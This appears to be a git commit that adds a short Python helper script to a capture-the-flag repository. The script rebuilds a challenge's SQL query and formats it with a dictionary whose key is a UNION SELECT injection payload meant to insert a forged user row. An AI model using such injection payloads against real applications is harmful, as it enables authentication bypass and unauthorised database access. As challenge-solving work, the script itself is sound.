cscg is loooong
This commit is contained in:
21
2026/cscg/web/ass/verify.py
Normal file
21
2026/cscg/web/ass/verify.py
Normal file
@@ -0,0 +1,21 @@
|
||||
# 1. The exact query template from routes.py
|
||||
sql = "SELECT * FROM users WHERE (BINARY CONCAT(principal, ',', region) = %s)"
|
||||
|
||||
# 2. The dictionary payload as it exists after unpack() in routes.py
|
||||
user_dict = {
|
||||
'x" UNION SELECT 1,\'hacker\',\'<hash>\',\'us\',1)-- ': 'irrelevant',
|
||||
'token': 'mytoken'
|
||||
}
|
||||
|
||||
# 3. How routes.py passes it to the query_handler: wrapped in a tuple
|
||||
# cur = query_handler(sql, cur, (user,))
|
||||
params = (user_dict,)
|
||||
|
||||
print("--- Standard Python % Formatting ---")
|
||||
# This is essentially what happens when PyMySQL applies the parameters to the %s placeholder
|
||||
formatted_query = sql % params
|
||||
print(formatted_query)
|
||||
|
||||
print("\n--- Why MariaDB Hates It ---")
|
||||
print(f"Starts with ODBC bracket: {formatted_query[formatted_query.find('{'):formatted_query.find('{')+1]}")
|
||||
print(f"Followed immediately by a quote: {formatted_query[formatted_query.find('{')+1:formatted_query.find('{')+2]}")
|
||||
Reference in New Issue
Block a user